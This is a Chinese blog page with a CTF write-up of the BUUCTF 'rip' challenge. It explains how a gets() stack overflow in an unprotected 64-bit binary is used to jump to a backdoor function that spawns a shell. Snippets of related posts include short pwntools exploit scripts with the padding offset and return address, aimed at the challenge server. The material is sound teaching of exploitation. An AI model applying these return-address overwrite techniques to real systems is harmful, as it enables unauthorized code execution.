BUUCTF -rip

利用IDA分析栈溢出漏洞
原创 已于 2022-07-20 21:59:28 修改 · 535 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #python

于 2022-07-20 21:58:40 首次发布
本文档介绍了通过查看文件属性、使用IDA反编译来分析一个64位程序的安全漏洞。作者发现了由于gets()函数的使用,导致了一个栈溢出的潜在风险。通过远程连接发送精心构造的payload,可以触发该漏洞并进行shell交互。

文章目录

一、查看文件

先file ./pwn1查看文件类型再checksec --file=pwn1检查一下文件保护情况。

在这里插入图片描述
在这里插入图片描述
得到信息:64位,各项保护都未开启。

二、使用IDA进行反编译

用IDA Pro 64bit打开 pwn1 后按 F5 反汇编源码并查看主函数,发现 gets() 函数读取输入到变量 s 中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。
在这里插入图片描述
在Functions window可以看到有一个fun()函数:
在这里插入图片描述
且fun()函数的起始地址为0x401186。
在这里插入图片描述

三、代码

最低0.47元/天 解锁文章
BUUCTFrip
^_^
12-08 3488
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
BUUCTF-rip
m0_64180167的博客
04-11 761
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
BUUCTF----rip解题过程
最新发布
2501_90908131的博客
10-14 355
这是一道关于栈溢出漏洞利用的CTF题目。分析发现64位ELF程序无任何保护机制(CANARY/NX/PIE未开启),通过gets函数的栈溢出漏洞实现攻击。程序存在后门函数(地址40011a),采用ret2text技术覆盖返回地址控制执行流。计算得到偏移量为0xf+8,构造payload跳转到后门函数即可获取shell。成功执行后通过cat flag命令获取flag。文章还简要介绍了常见保护机制(NX/DEP、ASLR、Canary等)及其绕过方法,以及ret指令、shell等关键概念。这种栈溢出利用是Pwn
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 853
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
BUUCTF(Pwn) rip
半岛铁盒的博客
03-20 639
按tab键,看一下 fun函数 发现其地址是 0x401186; 但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行 from pwn import * p = remote('node3.buuoj.cn', '25677') payload = 'a' * (0xf + 8) + p64(0x40118A) p.sendline(payload) p.interactive() ...
buuctf-rip
Nike_name的博客
06-13 847
利用get危险函数和system/bin/sh 的栈溢出
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1770
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 3952
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
BUUCTF-PWN】2-rip
燕麦葡萄干的博客
07-04 289
64位rbp是8位,32位rbp是4位,堆栈平衡需要在后门函数地址+1。查看main函数,gets()存在栈溢出。64位,未开启任何保护。定位到后门函数的地址。
BUUCTF|rip
cm_zl
04-30 2306
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
[BUUCTF]PWN2——rip
mcmuyanga的博客
08-23 1942
[BUUCTF]-rip 题目网址:https://buuoj.cn/challenges#rip 步骤: 例行检查附件,64位程序,没有开启任何保护 nc一下,看看输入点的提示字符串,让我们写入一个字符串,然后回显ok,bye 用对应位数的ida打开,shift+f12先来查看一下程序里有的字符串 这里可以看到有bin/sh还有system函数,对于这两个我们比较敏感,因为system(/bin/sh)这句代码能让我们直接获取shell 双击bin/sh跟进,然后安装ctrl+x查看一下哪里调用了这
[buuctf] rip
zn106414的博客
03-31 811
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1407
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
buuctf rip
z1r0的博客
12-03 580
rip 看一下保护 什么都没开 第6行有一个溢出,还有一个后门,直接ret2text。 payload中需要加上一个ret,平衡一下栈。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 29880) else: r = process(file_
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2929
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
[每日一PWN]BUUCTF RIP
qq_55233040的博客
11-19 405
比赛隐身,反思结束,从头详细记录一下,每日记录一题,第一题的nc就不用记了,所以直接从第二题rip开始。
BUUCTF rip 1
qq_56313338的博客
09-09 440
这是一题栈溢出,也提及了栈对齐操作
Pwn | CTF】BUUCTF rip1
weixin_46301214的博客
02-02 848
可能是因为fun函数里有system这种终端控制函数,所以能getshell吧。那么来看一下main,发现很简单,只有一个gets获取输入,存到s数组变量里。打开IDA,发现函数里有一个fun函数,能直接调用系统函数。然后又可以建立连接,很屌,解释不清楚,以后做多两题才懂。知道了缓冲区大小,下一步就要知道fun函数的入口地址。这文件是在靶机,就是靶机存在这个漏洞,我们要攻击他。从汇编上看,是能够发现有注释告诉我们的入口地址。我们要做的就是利用这个函数进行调用系统函数。看一下双击s变量,缓冲区大小。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值